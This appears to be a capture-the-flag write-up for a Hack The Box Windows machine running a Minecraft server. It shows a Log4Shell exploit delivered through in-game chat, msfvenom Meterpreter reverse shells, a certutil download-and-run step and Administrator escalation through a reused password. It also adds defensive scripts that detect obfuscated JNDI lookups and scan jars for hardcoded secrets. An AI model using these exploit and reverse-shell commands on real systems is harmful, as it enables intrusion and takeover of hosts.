Video version

All new content appears first on the t.me/kiberdruzhinnik channel. Subscribe so you don't miss it!

Watch it at t.me/kiberdruzhinnik/175.

Service overview

Do you think it's even worth spelling out where we start the investigation?

$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.225.128 -- -A -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.225.128:80
Open 10.129.225.128:25565
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.225.128
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-10 14:04 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Initiating Ping Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Ping Scan at 14:04, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:04
Completed Parallel DNS resolution of 1 host. at 14:04, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Connect Scan at 14:04, 2.45s elapsed (2 total ports)
Initiating Service scan at 14:04
NSE: Script scanning 10.129.225.128.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 5.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Nmap scan report for 10.129.225.128
Host is up, received syn-ack (0.15s latency).
Scanned at 2024-02-10 14:04:14 EST for 8s

PORT      STATE    SERVICE   REASON      VERSION
80/tcp    filtered http      no-response
25565/tcp filtered minecraft no-response

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

Only two ports are open: 80 (HTTP) and 25565 (Minecraft). Note that the nmap pass rustscan launched reported both as filtered/no-response even though rustscan had just connected to them, which is why the VERSION column is empty; if that happens, it is worth rerunning nmap -sV -p 80,25565 on its own before drawing conclusions. The web server is known as crafty.htb, so add it to /etc/hosts right away.

We also add the play.crafty.htb domain to /etc/hosts, although it won't be needed.

Public RCE exploit

We use the public log4j-shell-poc exploit. The Minecraft server logs chat messages through Log4j, so the JNDI payload is delivered as an in-game chat message via the pyCraft client:

$ git clone https://github.com/kozmer/log4j-shell-poc
$ cd log4j-shell-poc
# replace /bin/sh with cmd.exe, since the target is a Windows machine
$ nano poc.py
$ wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
$ tar -zxf jdk-8u181-linux-x64.tar.gz
# poc.py expects the JDK under this directory name
$ mv jdk1.8.0_181 jdk1.8.0_20
$ rlwrap nc -lnvp 4242
# in a separate window; the script prints the payload to send
$ python3 poc.py --userip 10.10.14.86 --webport 4243 --lport 4242
# copy the payload and open one more window
$ git clone https://github.com/ammaraskar/pyCraft
$ cd pyCraft
$ python3 -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
$ python3 start.py
# username
> 1
# empty password
>
# server
> 10.129.225.128
# our payload, sent as a chat message
> ...
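The flip side of the step above is worth having in the toolbox: the server writes every chat message into its log through Log4j, so the same log is where a defender (or a blue-team exercise after this box) would look for the payload. The example below is added here and is not part of the original writeup or of either PoC; it strips the usual Log4j lookup obfuscations (${lower:}, ${upper:}, ${::-x} and ${env:X:-x} default-value tricks) and then flags any JNDI lookup in the chat lines. The log lines are constructed; the attacker IP is the one used in this writeup, and the LDAP port 1389 is an assumption.

```python
import re

# Innermost Log4j lookup: a ${...} whose body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after de-obfuscation, e.g. ${jndi:ldap://10.10.14.86:1389/a}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)
# Chat line format of a vanilla/Paper server log (written to match the constructed samples below)
_CHAT = re.compile(r"^\[[^\]]+\] \[Server thread/INFO\]: <(?P<player>[^>]+)> (?P<msg>.*)$")


def _resolve_one(expr: str) -> str:
    """Evaluate one non-nested lookup the way vulnerable Log4j 2.x does when an
    attacker uses it purely for obfuscation. Modelled: ${lower:x}, ${upper:x} and
    the '${name:key:-default}' syntax (an unknown lookup with a default collapses
    to the default, which is how ${::-j} and ${env:NOPE:-j} both become 'j').
    Anything else is returned verbatim so the caller still sees it."""
    default = None
    if ":-" in expr:
        expr, default = expr.split(":-", 1)
    name, _, key = expr.partition(":")
    name = name.lower()
    if name == "lower":
        return key.lower()
    if name == "upper":
        return key.upper()
    if default is not None:
        return default
    return "${" + expr + "}"


def normalize(text: str) -> str:
    """Collapse innermost lookups repeatedly until the string stops changing."""
    while True:
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            return new
        text = new


def scan_chat_log(lines) -> list:
    """Return (player, jndi scheme, de-obfuscated message) for every chat message
    that contains a JNDI lookup once the obfuscation is stripped."""
    hits = []
    for line in lines:
        m = _CHAT.match(line)
        if not m:
            continue
        msg = normalize(m.group("msg"))
        j = _JNDI.search(msg)
        if j:
            hits.append((m.group("player"), j.group(1).lower(), msg))
    return hits


# Constructed sample log (not from the real box): one plain payload, two obfuscated
# ones, one benign ${...} and one non-chat line.
SAMPLE_LOG = """
[14:12:03] [Server thread/INFO]: <Steve> hello everyone
[14:12:09] [Server thread/INFO]: <Steve> ${jndi:ldap://10.10.14.86:1389/a}
[14:12:15] [Server thread/INFO]: <Alex> ${${lower:j}ndi:${lower:l}dap://10.10.14.86:1389/a}
[14:12:20] [Server thread/INFO]: <Alex> ${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-l}dap://10.10.14.86:1389/a}
[14:12:25] [Server thread/INFO]: <Steve> price is ${amount}
[14:12:30] [Server thread/INFO]: Alex left the game
""".strip().splitlines()

if __name__ == "__main__":
    for player, scheme, msg in scan_chat_log(SAMPLE_LOG):
        print(f"{player}: {scheme} -> {msg}")
```

Running it reports the three malicious lines as the same ${jndi:ldap://10.10.14.86:1389/a} lookup and ignores the harmless ${amount}; grepping the raw log for the literal "jndi" would have missed two of the three.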

User flag

Privilege escalation

In the server/plugins folder we find a server plugin.

C:\Users\svc_minecraft\server>cd plugins
C:\Users\svc_minecraft\server\plugins>dir
 Volume in drive C has no label.
 Volume Serial Number is C419-63F6

 Directory of C:\Users\svc_minecraft\server\plugins

10/27/2023  01:48 PM    <DIR>          .
10/27/2023  01:48 PM    <DIR>          ..
10/27/2023  01:48 PM             9,996 playercounter-1.0-SNAPSHOT.jar
               1 File(s)          9,996 bytes
               2 Dir(s)   3,257,896,960 bytes free

Let's switch to Meterpreter. Generate the payload and start the handler on the attacking machine:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4244 -f exe -o s.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4244
run
$ python3 -m http.server 4243

On the remote machine, fetch and run it:

certutil -urlcache -f http://10.10.14.86:4243/s.exe %temp%/s.exe
start %temp%/s.exe

Download the playercounter-1.0-SNAPSHOT.jar file through the Meterpreter session:

Decompiling it with jd-gui reveals a hardcoded RCON password used to manage the server:

RCON itself is disabled in the server settings, but the same password is reused for the local Administrator account.
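jd-gui is the comfortable way to do this, but the same check can be scripted for every jar on a box. The example below is added here and is not code from the writeup or from the plugin: it walks the constant pool of each .class inside a jar, keeps only the Utf8 entries referenced by a CONSTANT_String (true string literals, as opposed to method names and descriptors), and applies a heuristic for a key-like literal ("rcon.password") immediately followed by a value-like one. The jar it scans is constructed in memory; the class name demo/PlayerCounter.class and the value Demo-Rc0n-Passw0rd! are placeholders, not the real plugin's contents.

```python
import io
import re
import struct
import zipfile

# Byte widths of the fixed-size constant-pool entries (JVM spec, section 4.4); tag 1 (Utf8)
# is variable-length and tag 8 (String) is handled separately.
_CP_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
             15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def string_literals(class_bytes: bytes) -> list:
    """Return the string literals of one .class file, i.e. the Utf8 entries that a
    CONSTANT_String points at. Method names, descriptors and class names are Utf8
    entries too, but nothing references them via CONSTANT_String, so they are skipped."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", class_bytes, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    off, idx = 10, 1
    utf8, string_refs = {}, []
    while idx < count:
        tag = class_bytes[off]
        off += 1
        if tag == 1:
            (length,) = struct.unpack_from(">H", class_bytes, off)
            off += 2
            # The spec says modified UTF-8; plain UTF-8 is identical for ASCII secrets.
            utf8[idx] = class_bytes[off:off + length].decode("utf-8", "replace")
            off += length
        elif tag == 8:
            (ref,) = struct.unpack_from(">H", class_bytes, off)
            off += 2
            string_refs.append(ref)
        elif tag in _CP_FIXED:
            off += _CP_FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {off - 1}")
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two slots
    return [utf8[r] for r in string_refs if r in utf8]


def scan_jar(jar_bytes: bytes) -> dict:
    """Map every class in the jar to its string literals."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                lits = string_literals(jar.read(name))
                if lits:
                    out[name] = lits
    return out


_KEY_HINT = re.compile(r"pass|pwd|secret|token|rcon", re.IGNORECASE)


def credential_candidates(literals_by_class: dict) -> list:
    """Heuristic: a literal that looks like a credential key followed by a
    whitespace-free literal of 8+ characters is reported as (class, key, value).
    javac emits constants in first-use order, so a key/default pair from the
    source usually lands adjacent in the pool."""
    hits = []
    for cls, lits in literals_by_class.items():
        for key, value in zip(lits, lits[1:]):
            if _KEY_HINT.search(key) and re.fullmatch(r"\S{8,}", value):
                hits.append((cls, key, value))
    return hits


# --- constructed sample: a toy jar whose single class has only Utf8 + String
# constants (enough for this scanner; a JVM would not load it) ---
def _build_class(literals) -> bytes:
    pool, strings = b"", b""
    for i, s in enumerate(literals, start=1):
        data = s.encode("utf-8")
        pool += struct.pack(">BH", 1, len(data)) + data  # Utf8 at index i
        strings += struct.pack(">BH", 8, i)              # String -> index i
    count = 2 * len(literals) + 1
    return (struct.pack(">IHHH", 0xCAFEBABE, 0, 52, count) + pool + strings
            + struct.pack(">HHH", 0x0021, 0, 0))         # access_flags, this, super (dummy)


def sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("demo/PlayerCounter.class", _build_class(
            ["localhost", "rcon.password", "Demo-Rc0n-Passw0rd!", "Player count: "]))
    return buf.getvalue()


if __name__ == "__main__":
    for cls, key, value in credential_candidates(scan_jar(sample_jar())):
        print(f"{cls}: {key} = {value}")
```

Against a real jar, replace sample_jar() with the file's bytes; the adjacency heuristic is only a first filter, so review the full literal list from scan_jar() for anything it did not pair up.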

Upload the compiled runascs.exe to the machine and use it to get a shell as the administrator.

Here we generate the payload and start the listener.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4246 -f exe -o s2.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4246
run

And here we execute our payload as the Administrator user (the password is redacted below):

runascs.exe "Administrator" "xxx" "C:\\users\\svc_minecraft\\server\\logs\\s2.exe"

Root flag
